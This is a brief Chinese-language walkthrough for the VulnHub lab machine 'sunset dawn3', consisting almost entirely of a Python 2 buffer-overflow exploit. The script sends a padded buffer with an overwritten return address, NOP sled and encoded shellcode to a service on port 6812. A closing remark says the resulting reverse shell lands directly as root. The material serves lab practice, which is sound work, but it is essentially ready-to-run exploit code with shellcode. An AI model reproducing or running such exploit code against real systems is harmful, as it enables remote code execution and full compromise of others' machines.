下载地址
https://download.vulnhub.com/sunset/dawn3.ova
难度
中
扫描
登录ftp下载exe
EXP
#!/usr/bin/python
import socket
try:
print "\nSending evil buffer..."
filler = "A" * 524
eip = "\x13\x15\x50\x52"
buffer = (
"\xda\xc2\xd9\x74\x24\xf4\xbe\x61\x9c\xa7\xc9\x5b\x29\xc9\xb1"
"\x12\x31\x73\x17\x83\xc3\x04\x03\x12\x8f\x45\x3c\xe5\x74\x7e"
"\x5c\x56\xc8\xd2\xc9\x5a\x47\x35\xbd\x3c\x9a\x36\x2d\x99\x94"
"\x08\x9f\x99\x9c\x0f\xe6\xf1\xb2\xe0\x14\x04\xa3\x02\x25\x07"
"\x88\x8a\xc4\xb7\x88\xdc\x57\xe4\xe7\xde\xde\xeb\xc5\x61\xb2"
"\x83\xbb\x4e\x40\x3b\x2c\xbe\x89\xd9\xc5\x49\x36\x4f\x45\xc3"
"\x58\xdf\x62\x1e\x1a")
#inputBuffer = filler + eip + "\x90" * 20 + buffer + "\x00"
inputBuffer = filler + eip + "\x90" * 20 + buffer + "\x00"
buffer = inputBuffer
s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.12.13", 6812))
s.send(buffer)
s.close()
print "\nDone!"
except:
print "\nCould not connect!"
反弹直接root,不用提权了